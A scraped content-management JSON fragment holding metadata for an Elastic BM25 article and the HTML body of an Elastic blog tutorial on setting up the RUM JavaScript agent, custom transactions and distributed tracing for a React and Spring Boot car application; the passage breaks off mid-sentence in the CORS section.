/\u003e\u003c/p\u003e","category":[{"uid":"blte5cc8450a098ce5e","_version":4,"locale":"en-us","ACL":{},"created_at":"2023-11-02T21:51:15.490Z","created_by":"blt3044324473ef223b70bc674c","key":"how-to","label_l10n":"How to","tags":[],"title":"How to","updated_at":"2024-05-10T13:44:25.495Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"time":"2024-05-10T13:44:53.353Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}}],"created_at":"2019-04-01T13:08:00.249Z","created_by":"sys_blt57a423112de8a853","disclaimer":[],"full_bleed_image":{"title":"tuning_tools.jpg","uid":"bltaa0a041be934ae0f","created_by":"sys_blt57a423112de8a853","updated_by":"sys_blt57a423112de8a853","created_at":"2019-02-04T07:34:49.952Z","updated_at":"2019-02-04T07:34:49.952Z","content_type":"image/jpeg","file_size":"196446","filename":"tuning_tools.jpg","ACL":{},"_version":1,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2019-05-04T02:51:59.078Z","user":"blt3044324473ef223b70bc674c"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltaa0a041be934ae0f/5c57eb1922d96be10bcca39e/tuning_tools.jpg"},"markdown_l10n":"","product":["elasticsearch"],"publish_date":"2018-04-19T15:10:54.000Z","seo":{"seo_title_l10n":"Practical BM25 - Part 2: The BM25 Algorithm and its Variables","seo_description_l10n":"BM25 is the default similarity ranking (relevancy) algorithm in Elasticsearch. Learn more about how it works by digging into the equation and exploring the concepts behind its variables.","og_markup":{"facebook_profile_id":""},"canonical_tag":"","noindex":false},"tags":[],"tags_campaigns":[],"tags_culture":[],"tags_elastic_stack":[{"_version":3,"locale":"en-us","uid":"blta3fd0168b354a680","ACL":{},"created_at":"2023-11-06T21:50:30.740Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elk-elastic-stack","label_l10n":"ELK/Elastic Stack","tags":[],"title":"ELK/Elastic Stack","updated_at":"2024-03-12T21:21:08.589Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-03-12T21:21:14.279Z","user":"blt3044324473ef223b70bc674c"}},{"_version":1,"locale":"en-us","uid":"blt3d820a0eae1c9158","ACL":{},"created_at":"2020-06-17T03:35:53.368Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elasticsearch","label_l10n":"Elasticsearch","tags":[],"title":"Elasticsearch","updated_at":"2020-06-17T03:35:53.368Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:20.290Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"blt8b37b4b3ec0fe838","ACL":{},"created_at":"2020-06-17T03:36:06.107Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"kibana","label_l10n":"Kibana","tags":[],"title":"Kibana","updated_at":"2020-06-17T03:36:06.107Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:20.315Z","user":"blt4b2e1169881270a8"}}],"tags_event_type":[],"tags_industry":[],"tags_partner":[],"tags_role":[],"tags_stage":[],"tags_topic":[{"_version":1,"locale":"en-us","uid":"blt240c2986db0ba465","ACL":{},"created_at":"2023-11-06T21:31:10.051Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"search-applications","label_l10n":"Search applications","tags":[],"title":"Search applications","updated_at":"2023-11-06T21:31:10.051Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:31:38.331Z","user":"blt4b2e1169881270a8"}},{"title":"Search analytics","label_l10n":"Search analytics","keyword":"search-analytics","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt6c991eb897ec7277","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T21:30:57.427Z","updated_at":"2023-11-06T21:30:57.427Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-04T12:28:49.147Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"bltfb1e89b001674db9","ACL":{},"created_at":"2023-11-06T21:30:17.252Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"relevance","label_l10n":"Relevance","tags":[],"title":"Relevance","updated_at":"2023-11-06T21:30:17.252Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:31:38.339Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"blt0e7c39f65cbd3755","ACL":{},"created_at":"2023-11-06T20:37:20.943Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"data-ingestion","label_l10n":"Data ingestion","tags":[],"title":"Data ingestion","updated_at":"2023-11-06T20:37:20.943Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:33:19.173Z","user":"blt4b2e1169881270a8"}}],"tags_use_case":[{"_version":3,"locale":"en-us","uid":"blt10eb11313dc454f1","ACL":{},"created_at":"2020-06-17T03:30:26.497Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"enterprise-search","label_l10n":"Search","tags":[],"title":"Search","updated_at":"2023-07-19T16:04:51.718Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.232Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"title":"bm_25_tuning_pt2.jpg","uid":"bltf22aa508b8973986","created_by":"sys_blt57a423112de8a853","updated_by":"sys_blt57a423112de8a853","created_at":"2019-02-04T07:34:31.940Z","updated_at":"2019-02-04T07:34:31.940Z","content_type":"image/jpeg","file_size":"122328","filename":"bm_25_tuning_pt2.jpg","ACL":{},"_version":1,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2019-05-04T02:51:59.078Z","user":"blt3044324473ef223b70bc674c"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltf22aa508b8973986/5c57eb07f967c7fc0b4c6759/bm_25_tuning_pt2.jpg"},"title":"Practical BM25 — Part 2: The BM25 algorithm and its variables","title_l10n":"Practical BM25 — Part 2: The BM25 Algorithm and its variables","updated_at":"2024-09-13T16:11:44.507Z","updated_by":"bltd9765be97bbed20c","url":"/blog/practical-bm25-part-2-the-bm25-algorithm-and-its-variables","versions":[],"publish_details":{"time":"2024-09-13T16:11:49.782Z","user":"bltd9765be97bbed20c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"bltd2b7ac900ea47b01","_version":16,"locale":"en-us","ACL":{},"abstract_l10n":"","author":["blt54cbb3c8904457dd","blt265422bc68364b2e"],"body_l10n":"\u003cp\u003eSorry if I lured you into the mood of having a sip of a wonderful cocktail made with rum and you realized that the RUM I’m talking about is not the rum you are craving. But, be assured that Elastic RUM is equally wonderful! Let’s take a sip! I do want to warn you that it will take a bit of time to go through the amount of detail I will cover in this blog.\u003c/p\u003e\n\u003ch2\u003eWhat is RUM?\u003c/h2\u003e\n\u003cp\u003eElastic \u003ca href=\"https://www.elastic.co/guide/en/apm/agent/js-base/4.x/index.html\" target=\"_self\"\u003ereal user monitoring\u003c/a\u003e, or RUM, captures user interactions with the web browser and provides a detailed view of the “real user experience” of your web applications from a performance perspective. Elastic’s RUM Agent is a \u003ca href=\"https://www.elastic.co/guide/en/apm/agent/js-base/current/index.html\" target=\"_self\"\u003eJavaScript Agent\u003c/a\u003e, which means it supports any JavaScript-based application. RUM can provide valuable insight into your applications. Some of the common benefits of RUM include:\u003c/p\u003e\n\u003cul\u003e\n \u003cli\u003eRUM performance data can help you identify bottlenecks and discover how site performance issues affect your visitors’ experience\u003c/li\u003e\n \u003cli\u003eUser agent information captured by RUM enables you to identify the browsers, devices, and platforms most used by your customers so that you can make informed optimizations to your application\u003c/li\u003e\n \u003cli\u003eTogether with location information, individual user performance data from RUM helps you understand regional performance of your website worldwide\u003c/li\u003e\n \u003cli\u003eRUM provides insight and measurement for your application’s service level agreements (SLA)\u003c/li\u003e\n \u003cli\u003eRUM gathers information on customer visit and click behavior over time that can be useful for development teams to identify the impact of new features\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eGetting started with RUM using Elastic APM\u003c/h2\u003e\n\u003cp\u003eIn this blog, I will take you through the complete process of instrumenting a simple web application made of a React frontend and a Spring Boot backend, step by step. You will see how easy it is to use the RUM agent. As a bonus, you will also see how Elastic APM ties the frontend and the backend performance information together with a holistic, distributed trace view. Please see this previous blog for an overview of \u003ca href=\"https://www.elastic.co/blog/distributed-tracing-opentracing-and-elastic-apm\" target=\"_self\"\u003eElastic APM and distributed tracing\u003c/a\u003e if you are interested in knowing more details.\u003c/p\u003e\n\u003cp\u003eTo use Elastic APM \u003ca href=\"https://www.elastic.co/observability/real-user-monitoring\" target=\"_self\"\u003ereal user monitoring\u003c/a\u003e, you have to have the Elastic Stack with APM server installed. You can of course \u003ca href=\"https://www.elastic.co/downloads\" target=\"_self\"\u003edownload\u003c/a\u003e and install the latest Elastic Stack with APM server locally on your computer. However, the easiest approach would be creating an \u003ca href=\"https://cloud.elastic.co\" target=\"_self\"\u003eElastic Cloud\u003c/a\u003e trial account and have your cluster ready in a few minutes. APM is enabled for the default I/O Optimized template. From now on, I’ll assume you have a cluster ready to go.\u003c/p\u003e\n\u003ch3\u003eSample application\u003c/h3\u003e\n\u003cp\u003eThe application we are going to instrument is a simple car database application made of a \u003ca href=\"https://github.com/adamquan/carfront\" target=\"_self\"\u003eReact frontend\u003c/a\u003e and a \u003ca href=\"https://github.com/adamquan/cardatabase\" target=\"_self\"\u003eSpring Boot backend\u003c/a\u003e that provides API access to an in-memory car database. The application is purposely kept simple. The idea is to show you detailed instrumentation steps starting from zero so that you can instrument your own applications following the same steps.\u003c/p\u003e\n\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt6977d5827da59b86/5cb842a444c599c63eef1a56/sip-of-rum-1.png\" data-sys-asset-uid=\"blt6977d5827da59b86\" alt=\"A simple application with a React frontend and Spring backend\" /\u003e\u003c/p\u003e\n\u003cp\u003eCreate a directory called CarApp anywhere on your laptop. Then clone both the frontend and the backend application into that directory.\u003c/p\u003e\u003cpre class=\"prettyprint\"\u003egit clone https://github.com/carlyrichmond/carfront\u003cbr /\u003egit clone https://github.com/carlyrichmond/cardatabase\u003cbr /\u003e\u003c/pre\u003e\n\u003cp\u003eAs you can see, the application is extremely simple. There are only a couple of components in the React frontend and a few classes in the backend Spring Boot application. Build and run the application following the instructions in GitHub for both the frontend and backend. You should see something like this. You can browse, filter cars, and perform CRUD options on them.\u003c/p\u003e\n\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt7b68f2ba2628a996/5cb842a02a4acbd72a4882e5/sip-of-rum-2.png\" data-sys-asset-uid=\"blt7b68f2ba2628a996\" alt=\"The simple React user interface\" /\u003e\u003c/p\u003e\n\u003cp\u003eNow, with the application up running, we are ready to go through the instrumentation using the RUM agent.\u003c/p\u003e\n\u003ch3\u003eRich out-of-the-box instrumentation with RUM\u003c/h3\u003e\n\u003cp\u003eAn Elastic APM server is needed to get started. You will need to \u003ca href=\"https://www.elastic.co/guide/en/observability/current/apm-configuration-rum.html#apm-rum-enable\" target=\"_self\"\u003eenable RUM\u003c/a\u003e to capture the events from your RUM agent. To set up your RUM agent, there are two ways of doing so:\u003c/p\u003e\n\u003col\u003e\n \u003cli\u003eYou can install the RUM agent as a project dependency via a package manager such as npm:\u003cpre class=\"prettyprint\"\u003enpm install @elastic/apm-rum --save\u003cbr /\u003e\u003c/pre\u003e\n \u003c/li\u003e\n \u003cli\u003eInclude the RUM agent via the HTML script tag. \u003ca href=\"https://www.elastic.co/guide/en/apm/agent/rum-js/current/install-the-agent.html\" target=\"_self\"\u003eNote this can be performed as either a blocking or non-blocking operation as per the documentation\u003c/a\u003e.\u003cbr /\u003e\u003cpre class=\"prettyprint\"\u003e\u0026lt;script \u003cbr /\u003esrc=\"https://unpkg.com/@elastic/apm-rum@5.12.0/dist/bundles/elastic-apm-rum.umd.min.js\"\u0026gt;\u003cbr /\u003e\u0026lt;/script\u0026gt;\u003cbr /\u003e\u0026lt;script\u0026gt;\u003cbr /\u003e elasticApm.init({\u003cbr /\u003e serviceName: 'carfront',\u003cbr /\u003e serverUrl: 'http://localhost:8200',\u003cbr /\u003e serviceVersion: '0.90'\u003cbr /\u003e })\u003cbr /\u003e\u0026lt;/script\u0026gt;\u003cbr /\u003e\u003c/pre\u003e\n \u003c/li\u003e\n\u003c/ol\u003e\n\u003cp\u003eSince our frontend is a React application, we are going to use the first approach. Once you've installed @elastic/apm-rum in your project, check out the initialization code in rum.js . This is located in the same directory as your index.js and will look a bit like this, but with serviceUrl replaced with your own APM server endpoint:\u003c/p\u003e\u003cpre class=\"prettyprint\"\u003eimport { init as initApm } from '@elastic/apm-rum'\u003cbr /\u003evar apm = initApm({\u003cbr /\u003e // Set required service name (allowed characters: a-z, A-Z, 0-9, -, _, and space)\u003cbr /\u003e serviceName: 'carfront',\u003cbr /\u003e // Set the version of your application\u003cbr /\u003e // Used on the APM Server to find the right sourcemap\u003cbr /\u003e serviceVersion: '0.90',\u003cbr /\u003e // Set custom APM Server URL (default: http://localhost:8200)\u003cbr /\u003e serverUrl: 'APM_URL',\u003cbr /\u003e // distributedTracingOrigins: ['http://localhost:8080'],\u003cbr /\u003e})\u003cbr /\u003eexport default apm;\u003cbr /\u003e\u003c/pre\u003e\n\u003cp\u003eThat’s all it takes to initialize the RUM agent! If you are making use of framework specific features, such as routing in React, Angular, or Vue, you may want to also install and configure the framework specific integrations as well, which are covered in the \u003ca href=\"https://www.elastic.co/guide/en/apm/agent/rum-js/current/framework-integrations.html\" target=\"_self\"\u003edocumentation\u003c/a\u003e. In this case, as this is a single page that doesn't require React specific instrumentation, we have not installed the additional dependency.\u003c/p\u003e\n\u003cp\u003eDon't worry about distributedTracingOrigins right now. Here's a quick explanation of some of the other configurations:\u003c/p\u003e\n\u003col\u003e\n \u003cli\u003e\u003cstrong\u003eService name:\u003c/strong\u003e The service name has to be set. It represents your application in the APM UI. Name it something meaningful.\u003c/li\u003e\n \u003cli\u003e\u003cstrong\u003eService version:\u003c/strong\u003e This is the version of your application. This version number is also used by the APM server to find the right source map. We will discuss the source map in detail later.\u003c/li\u003e\n \u003cli\u003e\u003cstrong\u003eServer URL:\u003c/strong\u003e This is the APM server URL. Note that the APM server URL is normally accessible from the public internet because your RUM agent reports data to it from end-user browsers on the internet.\u003c/li\u003e\n\u003c/ol\u003e\n\u003cp\u003ePeople who are familiar with Elastic APM backend agents might be wondering why the APM token was not passed here. That’s because the RUM agent doesn't actually use a secret APM token. The token is only used for backend agents. Because the frontend code is public, the secret token does not provide additional security.\u003c/p\u003e\n\u003cp\u003eWe will load this JavaScript file when the application loads and include it in places that we want to perform custom instrumentation. For now, let’s see what we get out of the box, without any custom instrumentation. To do so, we simply need to include rum.js in index.js . The index.js file imports rum.js and sets a page load name. Without setting a page load name, you will see the page load listed as “/” in the APM UI, which is not very intuitive. Here is what index.js looks like.\u003c/p\u003e\u003cpre class=\"prettyprint\"\u003eimport apm from './rum'\u003cbr /\u003eimport React from 'react';\u003cbr /\u003eimport ReactDOM from 'react-dom';\u003cbr /\u003eimport './index.css';\u003cbr /\u003eimport App from './App';\u003cbr /\u003eimport * as serviceWorker from './serviceWorker';\u003cbr /\u003eapm.setInitialPageLoadName(\"Car List\")\u003cbr /\u003eReactDOM.render(\u0026lt;App /\u0026gt;, document.getElementById('root'));\u003cbr /\u003eserviceWorker.unregister();\u003cbr /\u003e\u003c/pre\u003e\n\u003cp\u003eGenerate some traffic to your application by accessing pages and adding or deleting cars. Then log into Kibana and click on the Observability tile. From there, select the Services option from the APM submenu, as shown below:\u003c/p\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt7aba56906f514b72/63504a2919d8652169cfad8c/blog-elastic-RUMAPM-1.png\" height=\"auto\" /\u003e\n\u003cp\u003e\u003c/p\u003e\n\u003cp\u003eYou should see a service called \"carfront\" listed. Clicking on the service name takes you to the transaction page. You should see an overview of metrics such as latency and throughput for the default time frame of \"Last 15 minutes.\" If not, change the time picker to this range.\u003c/p\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt71bb7e870ae40a92/63504a83bbff0b3fd98e25e1/blog-elastic-RUMAPM-2.png\" height=\"auto\" /\u003e\n\u003cp\u003e\u003c/p\u003e\n\u003cp\u003eIn the transactions segment, you should see the \"Car List\" transaction. Click on the \"Car List\" link, and you will move to the Transaction tab, which contains statistics for this sample of transactions. Scrolling to the bottom of the page, you will see a waterfall view of browser interactions like this:\u003c/p\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt62e1a3ddd74a6719/63504ad4b3f39b38fccfe7db/blog-elastic-RUMAPM-3.png\" height=\"auto\" /\u003e\n\u003cp\u003e\u003c/p\u003e\n\u003cp\u003eAmazed by how much information is captured by the RUM agent by default? Pay special attention to the \u003cstrong\u003emarkers\u003c/strong\u003e at the top like timeToFirstByte, domInteractive, domComplete, and firstContentfulPaint. Mouse over the black dots to see the names. They provide you with great details about content retrieval and browser rendering of these contents. Also, pay attention to all the performance data about resource loading from the browser. By just initializing your RUM agent, without any custom instrumentation, you get all these detailed performance metrics, out of the box! When there is a performance issue, these metrics enable you to easily decide whether the issue is due to slow backend services, a slow network, or simply a slow client browser. That is very impressive!\u003c/p\u003e\n\u003cp\u003e\u003c/p\u003e\n\u003cp\u003eFor those of you who need a refresher, here is a quick explanation of the web performance metrics. Do keep in mind that for modern web application frameworks like React, these metrics might only represent the “static” part of the web page, due to the async nature of React. For example, dynamic contents might still be loading after \u003cstrong\u003edomInteractive\u003c/strong\u003e, as you will see later.\u003c/p\u003e\n\u003cul\u003e\n \u003cli\u003e\u003cstrong\u003etimeToFirstByte\u003c/strong\u003e is the amount of time a browser waits to receive the first piece of information from the web server after requesting it. It represents a combination of network and server-side processing speed.\u003c/li\u003e\n \u003cli\u003e\u003cstrong\u003edomInteractive\u003c/strong\u003e is the time immediately before the user agent sets the current document readiness to “interactive,” which means the browser has finished parsing all of the HTML and DOM construction has completed.\u003c/li\u003e\n \u003cli\u003e\u003cstrong\u003edomComplete\u003c/strong\u003e is the time immediately before the user agent sets the current document readiness to “complete,” which means the page and all of its subresources like images have finished downloading and are ready. The loading spinner has stopped spinning.\u003c/li\u003e\n \u003cli\u003e\u003cstrong\u003efirstContentfulPaint\u003c/strong\u003e is the time the browser renders the first bit of content from the DOM. This is an important milestone for users because it provides feedback that the page is actually loading.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFlexible custom instrumentation\u003c/h3\u003e\n\u003cp\u003eThe RUM agent provides detailed instrumentation for your browser interaction out of the box, as you just saw. You can also perform custom instrumentations when needed. For example, because the React application is a single-page-application and deleting a car will not trigger a “page load,” RUM does not by default capture the performance data of deleting a car. We can use custom transactions for something like that.\u003c/p\u003e\n\u003cp\u003eWith our current release (APM Real User Monitoring JavaScript Agent 5.x), AJAX calls and click events are captured by the agent and sent to the APM server. \u003ca href=\"https://www.elastic.co/guide/en/apm/agent/rum-js/current/configuration.html#disable-instrumentations\" target=\"_self\"\u003eConfiguring the types of interactions can be achieved using the disableInstrumentation setting\u003c/a\u003e.\u003c/p\u003e\n\u003cp\u003eIt is also possible to add your own custom instrumentations to give more meaningful traces. This can particularly be useful for tracing new features. In our example application, the \u003cstrong\u003e\"New Car\"\u003c/strong\u003e button in our frontend application allows you to add a new car to the database. We will instrument the code to capture the performance of adding a new car. Open the file Carlist.js in the components directory. You will see the following code:\u003c/p\u003e\u003cpre class=\"prettyprint\"\u003e// Add new car\u003cbr /\u003eaddCar(car) {\u003cbr /\u003e // Add car metadata as labels to the RUM click transaction\u003cbr /\u003e var transaction = apm.startTransaction(\"Add Car\", \"Car\");\u003cbr /\u003e transaction.addLabels(car);\u003cbr /\u003e fetch(SERVER_URL + 'api/cars',\u003cbr /\u003e {\u003cbr /\u003e method: 'POST',\u003cbr /\u003e headers: {\u003cbr /\u003e 'Content-Type': 'application/json',\u003cbr /\u003e },\u003cbr /\u003e body: JSON.stringify(car)\u003cbr /\u003e })\u003cbr /\u003e .then(res =\u0026gt; this.fetchCars())\u003cbr /\u003e .catch(err =\u0026gt; console.error(err))\u003cbr /\u003e}\u003cbr /\u003efetchCars = () =\u0026gt; {\u003cbr /\u003e fetch(SERVER_URL + 'api/cars')\u003cbr /\u003e .then((response) =\u0026gt; response.json())\u003cbr /\u003e .then((responseData) =\u0026gt; {\u003cbr /\u003e this.setState({\u003cbr /\u003e cars: responseData._embedded.cars,\u003cbr /\u003e });\u003cbr /\u003e })\u003cbr /\u003e .catch(err =\u0026gt; console.error(err));\u003cbr /\u003e // End the current transaction at the end of the response call back\u003cbr /\u003e var transaction = apm.getCurrentTransaction()\u003cbr /\u003e if (transaction) transaction.end()\u003cbr /\u003e}\u003cbr /\u003e\u003c/pre\u003e\n\u003cp\u003eThe code basically created a new transaction called \u003cstrong\u003e“Add Car”\u003c/strong\u003e of \u003cstrong\u003e“Car”\u003c/strong\u003e type. Then, it tagged the transaction with the car to provide contextual information. We then explicitly ended the transaction at the end of the method.\u003c/p\u003e\n\u003cp\u003eAdd a new car from the application web UI. Click on the APM UI in Kibana. You should see an “Add Car” transaction listed. Make sure you select “Car” in the “Filter by type” dropdown. By default, it displays “page-load” transactions.\u003c/p\u003e\n\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltcad2c799aa1c6e1b/63504d554e565f1cdce2944e/blog-elastic-RUMAPM-4.png\" height=\"auto\" /\u003e\u003c/p\u003e\n\u003cp\u003eClick on the “Add Car” transaction link. You should see performance information of the custom transaction “Add Car”:\u003c/p\u003e\n\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltda3d29bf6e005b2a/63504d720528631ea56813e7/blog-elastic-RUMAPM-5.png\" height=\"auto\" /\u003e\u003c/p\u003e\n\u003cp\u003eClick on the “Metadata” tab. You will see the labels we added along with the default labels captured by the agent. Labels and logs add valuable contextual information to your APM traces.\u003c/p\u003e\n\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltb11888816b7654a2/63504daf1d78fa218f251d72/blog-elastic-RUMAPM-6.png\" height=\"auto\" /\u003e\u003c/p\u003e\n\u003cp\u003eThat’s really all it takes to do a custom instrumentation — easy yet powerful! For more details, see the \u003ca href=\"https://www.elastic.co/guide/en/apm/agent/js-base/current/api.html\" target=\"_self\"\u003eAPI documentation\u003c/a\u003e.\u003c/p\u003e\n\u003ch3\u003eUser experience dashboard\u003c/h3\u003e\n\u003cp\u003eElastic APM offers a curated APM UI and built-in APM dashboards to visualize all the APM data captured by the agents out of the box.\u003c/p\u003e\n\u003cp\u003eYou can also create your own custom visualizations in Elastic using \u003ca href=\"https://www.elastic.co/guide/en/observability/current/apm-ingest-pipelines.html\" target=\"_self\"\u003eingest node pipelines\u003c/a\u003e to enrich and transform your APM data. For example, the user IP and user agent data captured by the RUM agent represent very rich information about your customers. With all the information of user IP and user agent, it’s possible to create a visualization like this to show where the web traffic comes from on a map and what operating systems and browsers your customers are using.\u003c/p\u003e\n\u003cp\u003eHowever, many of the user data of interest could be present in the User Experience Dashboard visible in Elastic Observability. Sample visualizations are presented below:\u003c/p\u003e\n\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt7555ce1a42a4a337/63504e72dcd7cf2a10750b49/blog-elastic-RUMAPM-7.png\" height=\"auto\" /\u003e\u003c/p\u003e\n\u003ch2\u003eSee the big picture with distributed tracing\u003c/h2\u003e\n\u003cp\u003eAs a bonus point, we will also instrument our backend Spring Boot application so that you have a complete view of the overall transaction from the web browser all the way to the backend database, all in one view. Elastic APM distributed tracing enables you to do so.\u003c/p\u003e\n\u003ch3\u003eConfiguring distributed tracing in RUM agents\u003c/h3\u003e\n\u003cp\u003e\u003ca href=\"https://www.elastic.co/guide/en/apm/agent/js-base/current/distributed-tracing-guide.html\" target=\"_self\"\u003eDistributed tracing\u003c/a\u003e is enabled by default in the RUM agent. However, it only includes requests made to the same origin. In order to include cross-origin requests, you must set the distributedTracingOrigins configuration option. You will also have to set the CORS policy in the backend application, as we will discuss in the next section.\u003c/p\u003e\n\u003cp\u003eFor our application, the frontend is served from \u003ca href=\"http://localhost:3000\" target=\"_self\"\u003ehttp://localhost:3000\u003c/a\u003e. To include requests made to http://localhost:8080, we need to add the distributedtracingOrigins configuration to our React application. This is done inside rum.js. The code is already there. Simply uncommenting the line will do.\u003c/p\u003e\u003cpre class=\"prettyprint\"\u003evar apm = initApm({\u003cbr /\u003e ...\u003cbr /\u003e distributedTracingOrigins: ['http://localhost:8080']\u003cbr /\u003e})\u003cbr /\u003e\u003c/pre\u003e\n\u003cp\u003e\u003ca href=\"https://www.elastic.co/guide/en/apm/guide/8.4/distributed-tracing.html#w3c-tracecontext\" target=\"_self\"\u003eNew agent versions\u003c/a\u003e implement the W3C Trace Context specification and traceparent header to requests made to http://localhost:8080. However, note that previously this was achieved by adding the custom header elastic-apm-traceparent to these requests.\u003c/p\u003e\n\u003cp\u003eAs per the latest version documentation, the server side instrumentation can be configured in three possible ways:\u003c/p\u003e\n\u003col\u003e\n \u003cli\u003eAutomatic attaching to the running JVM using the \u003cstrong\u003eapm-agent-attach-cli.jar\u003c/strong\u003e\u003c/li\u003e\n \u003cli\u003eProgrammatic setup using the \u003cstrong\u003eapm-agent-attach\u003c/strong\u003e, which requires a code change to your Java application\u003c/li\u003e\n \u003cli\u003eManual setup using the \u003cstrong\u003e-javaagent\u003c/strong\u003e flag, as we shall do in the subsequent example\u003c/li\u003e\n\u003c/ol\u003e\n\u003cp\u003eTo use the manual instrumentation approach on the server side, you need to \u003ca href=\"https://search.maven.org/search?q=g:co.elastic.apm%20AND%20a:apm-agent-api\" target=\"_self\"\u003edownload\u003c/a\u003e the Java agent and start your application with it. In your favorite IDE, you will need to add the below vmArgs to the launch configuration.\u003c/p\u003e\u003cpre class=\"prettyprint\"\u003e-javaagent:apm/wrapper/elastic-apm-agent-1.33.0.jar \u003cbr /\u003e-Delastic.apm.service_name=cardatabase \u003cbr /\u003e-Delastic.apm.application_packages=com.packt.cardatabase\u003cbr /\u003e-Delastic.apm.server_urls=\u0026lt;YOUR_APM_ENDPOINT\u0026gt; \u003cbr /\u003e-Delastic.apm.secret_token=\u0026lt;YOUR_SECRET_TOKEN\u0026gt;\u003cbr /\u003e\u003c/pre\u003e\n\u003cp\u003e\u003c/p\u003e\n\u003cp\u003eIf you are using Elastic Cloud, full configuration for both the RUM and APM agents can be found in the APM Integration of your deployment, a sample of which is visible below.\u003c/p\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt0fb070fa4f93a460/635050b0ad35ab2389acc989/blog-elastic-RUMAPM-8.png\" height=\"auto\" /\u003e\n\u003cp\u003e\u003c/p\u003e\n\u003cp\u003eWhere the agents are configured will depend on your IDE of choice. The below screenshot is of my VSCode launch configuration for the Spring Boot application:\u003c/p\u003e\u003cimg height=\"auto\" src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt9c52c3334a613da2/635050e70528631ea56813fb/blog-elastic-RUMAPM-9.png\" width=\"727\" max-width=\"727\" style=\"width: 727;height: auto;\" /\u003e\n\u003cp\u003e\u003c/p\u003e\n\u003cp\u003eNow, refresh your car list from the browser to generate another request. Go to the Kibana APM UI and check the last “car list” page load. You should see a full trace including Java method invocations, similar to the following screenshot:\u003c/p\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltf5331328f1218b47/63505112b0662c1e9a674687/blog-elastic-RUMAPM-10.png\" height=\"auto\" /\u003e\n\u003cp\u003e\u003c/p\u003e\n\u003cp\u003eAs you can see, your client-side performance data from the browser and your server-side performance data, including JDBC access, all show up nicely in one distributed trace. Notice different colors for different parts of the distributed trace. Keep in mind this is the default tracing you get, without having to do any custom instrumentation on the server side, other than starting your application with the agent. Feel the power of Elastic APM and distributed tracing!\u003c/p\u003e\n\u003cp\u003eFor readers who are really paying attention to the timeline visualization above, you might be wondering why the “Car List” page-load transaction ends at 193 ms, which is the \u003cstrong\u003edomInteractive\u003c/strong\u003e time, while data is still being served from the backend. Great question! This is due to the fact that the fetch calls are async by default. The browser “thinks” it finished parsing all the HTML and DOM construction is complete at 193 ms because it loaded all the “static” HTML contents served from the web server. On the other hand, React is still loading data from the backend server asynchronously.\u003c/p\u003e\n\u003ch3\u003eCross-origin resource sharing (CORS)\u003c/h3\u003e\n\u003cp\u003eThe RUM agent is only one piece of the puzzle in a distributed trace. In order to use distributed tracing, we need to properly configure other components, too. One of the things that you will normally have to configure is cross-origin resource sharing, the “notorious” CORS! This is because the frontend and the backend services are typically deployed separately. With the \u003cem\u003e\u003cstrong\u003esame-origin\u003c/strong\u003e\u003c/em\u003e 